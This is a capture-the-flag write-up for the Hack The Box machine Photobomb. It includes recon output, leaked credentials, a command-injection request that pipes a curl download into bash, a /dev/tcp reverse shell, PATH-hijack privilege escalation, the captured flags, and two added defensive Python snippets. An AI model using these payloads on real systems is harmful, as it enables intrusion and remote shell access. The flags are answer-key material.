HTB Photobomb done
Photobomb
Notes
OS: Linux
Technology:
IP Address: 10.129.228.60
Open ports:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)
Users and pass:
From http://photobomb.htb/photobomb.js
L: pH0t0
P: b0Mb!
Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.228.60_nmap 10.129.228.60 ; cat 10.129.228.60_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-17 13:45 CEST
Nmap scan report for 10.129.228.60
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
| 256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_ 256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ cat /etc/hosts | tail -n1
10.129.228.60 photobomb.htb
Ffuf: http://photobomb.htb
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ ffuf -u http://photobomb.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o photobomb.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://photobomb.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : photobomb.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
favicon.ico [Status: 200, Size: 10990, Words: 11, Lines: 3, Duration: 91ms]
printer.txt [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer.bac [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer.html [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer.php [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 45ms]
printer.git [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 34ms]
printer.backup [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 38ms]
printer-friendly.html [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 59ms]
printer_friendly.php [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 43ms]
printer-friendly.php [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer-friendly.md [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer_friendly [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer-friendly.git [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer-friendly.backup [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer-friendly.bac [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer-friendly.txt [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printer_friendly.html [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 43ms]
printer-friendly [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 45ms]
printer.md [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 50ms]
printer_friendly.txt [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 43ms]
printer_friendly.bac [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 55ms]
printerfriendly.php [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 49ms]
printerfriendly.txt [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 45ms]
printer_friendly.backup [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 53ms]
printerfriendly [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 49ms]
printerfriendly.bac [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 44ms]
printers.php [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 37ms]
printerfriendly.git [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 38ms]
printerfriendly.backup [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 38ms]
printers [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 32ms]
printerfriendly.md [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 38ms]
printer_friendly.git [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 53ms]
printer_friendly.md [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 54ms]
printerfriendly.html [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 45ms]
printers.txt [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 34ms]
printers.bac [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 32ms]
printers.html [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 34ms]
printers.backup [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 33ms]
printers.git [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 33ms]
printers.md [Status: 401, Size: 188, Words: 6, Lines: 8, Duration: 34ms]
:: Progress: [163752/163752] :: Job [1/1] :: 662 req/sec :: Duration: [0:04:22] :: Errors: 0 ::
Open website: http://photobomb.htb/ (nothing interesting here)
Ffuf subdomain: http://photobomb.htb
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ ffuf -u http://photobomb.htb -H "Host: FUZZ.photobomb.htb" -w /usr/share/wordlists/dirb/big.txt -o photobomb.htb_ffuz_subdomain | grep -v 154
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://photobomb.htb
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Header : Host: FUZZ.photobomb.htb
:: Output file : photobomb.htb_ffuz_subdomain
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [20469/20469] :: Job [1/1] :: 431 req/sec :: Duration: [0:00:23] :: Errors: 0 ::
Read javascript code: http://photobomb.htb/photobomb.js
I found creds:
L: pH0t0
P: b0Mb!
---
view-source:http://photobomb.htb/photobomb.js
---
function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
  }
}
window.onload = init;
Open website with the creds: http://pH0t0:b0Mb!@photobomb.htb/printer (lands on http://photobomb.htb/printer)
Command injection
Checking which parameter is injectable: the first request puts ;sleep%205 in dimensions, the second puts it in filetype.
Command injection confirmed in: filetype=jpg;sleep%205 (the response takes about 5 seconds longer)
---
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: keep-alive
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
Priority: u=0, i
photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg&dimensions=3000x2000;sleep%205
---
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: keep-alive
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
Priority: u=0, i
photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg;sleep%205&dimensions=3000x2000
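Added defensive example (my own code, not code from the writeup or from the Photobomb application, whose server side is not shown on this page): the two requests above show that filetype is pasted into a command line that a shell parses, so the ; ends the converter invocation and starts sleep 5. The snippet assumes a converter at /usr/bin/convert, an output directory of /tmp and the source_images directory that cleanup.sh refers to later on this page. vulnerable_command() reconstructs the weak pattern for comparison only; validate_print_params() and safe_argv() show the fix: allowlist every field and pass the values as separate argv elements with shell=False, so nothing the client sends is ever shell-parsed.

```python
import re
import shlex
import subprocess

# Assumed paths (not from the page): converter binary and output location.
CONVERTER = "/usr/bin/convert"
SOURCE_DIR = "source_images"
OUT_DIR = "/tmp"

ALLOWED_FILETYPES = {"jpg", "png"}
DIMENSIONS_RE = re.compile(r"^(\d{1,5})x(\d{1,5})$")
PHOTO_RE = re.compile(r"^[A-Za-z0-9_-]+\.jpg$")   # bare filename only, no '/' or '..'


def vulnerable_command(photo: str, filetype: str, dimensions: str) -> str:
    """Weak pattern (an assumed reconstruction of the bug class, not the box's code):
    user input is pasted into one string that a shell will parse, so ';' in
    filetype ends the converter and starts a second command."""
    return (f"{CONVERTER} {SOURCE_DIR}/{photo} -resize {dimensions} "
            f"{filetype}:{OUT_DIR}/out.{filetype}")


def shell_would_split(cmd: str) -> bool:
    """True if a POSIX shell would see more than one command in cmd.
    shlex with punctuation_chars=True tokenises ; | & the way a shell does."""
    tokens = list(shlex.shlex(cmd, punctuation_chars=True))
    return any(t in {";", "|", "&", "||", "&&"} for t in tokens)


def validate_print_params(photo: str, filetype: str, dimensions: str) -> tuple[bool, str]:
    """Allowlist validation of the three POST fields. Returns (ok, reason)."""
    if not PHOTO_RE.fullmatch(photo):
        return False, "photo: only a bare .jpg filename is accepted"
    if filetype not in ALLOWED_FILETYPES:
        return False, "filetype: not in allowlist"
    m = DIMENSIONS_RE.fullmatch(dimensions)
    if not m:
        return False, "dimensions: must be WIDTHxHEIGHT"
    width, height = int(m.group(1)), int(m.group(2))
    if not (1 <= width <= 10000 and 1 <= height <= 10000):
        return False, "dimensions: out of range"
    return True, "ok"


def safe_argv(photo: str, filetype: str, dimensions: str) -> list[str]:
    """Build the converter invocation as an argument vector. Each field is one
    argv element, so even a loosened validator could not hand a value to a shell."""
    ok, reason = validate_print_params(photo, filetype, dimensions)
    if not ok:
        raise ValueError(reason)
    return [CONVERTER, f"{SOURCE_DIR}/{photo}", "-resize", dimensions,
            f"{filetype}:{OUT_DIR}/out.{filetype}"]


def run_converter(photo: str, filetype: str, dimensions: str) -> subprocess.CompletedProcess:
    """Execute without a shell and with a timeout so a hung converter cannot
    tie up the worker; never use shell=True here."""
    return subprocess.run(safe_argv(photo, filetype, dimensions),
                          shell=False, check=True, timeout=30, capture_output=True)


if __name__ == "__main__":
    # Constructed inputs: the filename from the page's request, once clean, once injected.
    good = ("andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg", "jpg", "3000x2000")
    bad = ("andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg", "jpg;sleep 5", "3000x2000")
    print("weak pattern splits into two commands:", shell_would_split(vulnerable_command(*bad)))
    print("allowlist verdict for injected filetype:", validate_print_params(*bad))
    print("argv for a valid request:", safe_argv(*good))
```

The allowlist is the primary control; the argv form is defence in depth, because it removes the shell from the path entirely rather than trying to escape metacharacters. Keeping the photo field to a bare filename also closes the path-traversal angle that a free-form name would open.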
Create revshell
1)
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ cat revshell.sh
bash -c 'exec bash -i &>/dev/tcp/10.10.14.48/80 <&1'
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ python3 -m http.server 4000
Serving HTTP on 0.0.0.0 port 4000 (http://0.0.0.0:4000/) ...
10.129.228.60 - - [18/Apr/2025 21:50:53] "GET /revshell.sh HTTP/1.1" 200 -
---
2)
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 120
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: keep-alive
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
Priority: u=0, i
photo=andrea-de-santis-uCFuP0Gc_MM-unsplash.jpg&filetype=jpg;curl+10.10.14.48:4000/revshell.sh|bash&dimensions=3000x2000
---
3)
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Photobomb]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.48] from (UNKNOWN) [10.129.228.60] 58472
bash: cannot set terminal process group (692): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$
wizard@photobomb:~/photobomb$
Read flag: user.txt
wizard@photobomb:~/photobomb$ find / -name "user.txt" 2>/dev/null
/home/wizard/user.txt
wizard@photobomb:~/photobomb$
wizard@photobomb:~/photobomb$ cat /home/wizard/user.txt
e817c807d211c9b9ab2ded31a3827b66
Privilege Escalation
Read sudoers
wizard@photobomb:~$ sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
wizard@photobomb:~$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
Path Hijacking
wizard@photobomb:~$ echo -e '#!/bin/bash\n\nbash' > /tmp/find
wizard@photobomb:~$ chmod a+x /tmp/find
wizard@photobomb:~$ cd /tmp/
wizard@photobomb:/tmp$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
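Added audit example (my own code, not from the writeup): the hijack above works because /opt/cleanup.sh calls find (and, through -exec, chown) by bare name while the sudo rule carries SETENV, which lets the caller supply its own PATH. The script below parses a sudo -l listing and a shell script, both embedded as constructed copies of what this page shows, and reports every command word that the shell would resolve through PATH inside a SETENV target. The fix it points at is the standard one: call /usr/bin/find and /usr/bin/chown by absolute path (or pin PATH at the top of the script) and drop SETENV from the rule.

```python
import re
import shlex

# Constructed copies of the listings shown in this writeup (sudo -l and /opt/cleanup.sh).
SUDO_L_OUTPUT = r"""Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
"""

CLEANUP_SH = r"""#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
"""

# Tokens bash resolves itself, never through PATH.
KEYWORDS = {"if", "then", "else", "elif", "fi", "do", "done", "while", "until", "!", "{", "}"}
BUILTINS = {"cd", "echo", "exit", "export", "set", "unset", "test", "[", "[[", ".", "source",
            "return", "shift", "true", "false", "trap", "umask", "read"}
CONNECTORS = {";", "&&", "||", "|", "&"}
# find(1) execs its -exec/-execdir argument through PATH as well.
EXEC_FLAGS = {"-exec", "-execdir"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_rules(text: str) -> list[dict]:
    """Extract '(runas) TAG: TAG: command' lines from sudo -l output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        rules.append({"runas": m.group("runas").strip(), "command": m.group("cmd").strip(),
                      "setenv": "SETENV" in tags, "nopasswd": "NOPASSWD" in tags})
    return rules


def path_dependent_commands(script: str) -> list[tuple[int, str]]:
    """Return (line, command) for every command word a shell would look up via PATH."""
    findings = []
    for lineno, line in enumerate(script.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        try:
            tokens = shlex.split(stripped, comments=True)
        except ValueError:       # unbalanced quotes: skip rather than guess
            continue
        expect_cmd = True        # True when the next token is in command position
        for tok in tokens:
            if tok in CONNECTORS or tok in KEYWORDS or tok in EXEC_FLAGS:
                expect_cmd = True
                continue
            if not expect_cmd:
                continue
            if "=" in tok and not tok.startswith("="):
                continue         # VAR=value prefix; the command still follows
            expect_cmd = False
            if tok in BUILTINS or tok.startswith("/"):
                continue         # builtin or absolute path: not PATH-resolved
            findings.append((lineno, tok))
    return findings


def assess(sudo_text: str, script_text: str) -> list[str]:
    """Cross-check: a SETENV rule whose target script (script_text is assumed to be
    that target) resolves commands via PATH is exposed to the hijack shown above."""
    findings = path_dependent_commands(script_text)
    issues = []
    for rule in parse_sudo_rules(sudo_text):
        if rule["setenv"] and findings:
            cmds = ", ".join(sorted({c for _, c in findings}))
            issues.append(f"{rule['command']} runs as {rule['runas']} with SETENV "
                          f"and resolves {cmds} via PATH")
    return issues


if __name__ == "__main__":
    for lineno, cmd in path_dependent_commands(CLEANUP_SH):
        print(f"line {lineno}: '{cmd}' is resolved through PATH")
    for issue in assess(SUDO_L_OUTPUT, CLEANUP_SH):
        print("RISK:", issue)
```

The secure_path default in the listing is not enough on its own: the page's own session shows that sudo PATH=$PWD:$PATH /opt/cleanup.sh is accepted because SETENV lets the caller override the environment. Removing SETENV and using absolute paths closes both halves of the problem; either one alone would have been enough to stop this particular script.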
Read flag: root.txt
root@photobomb:/home/wizard/photobomb# id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:/home/wizard/photobomb# cd /tmp/
root@photobomb:~# cd /root
root@photobomb:~# ls -a
. .. .bash_history .bashrc .cache .local .profile root.txt .ssh
root@photobomb:~#
root@photobomb:~# cat root.txt
2ded111442d3f17b39dacbab7c0572ec
root@photobomb:~#
References
Lessons Learned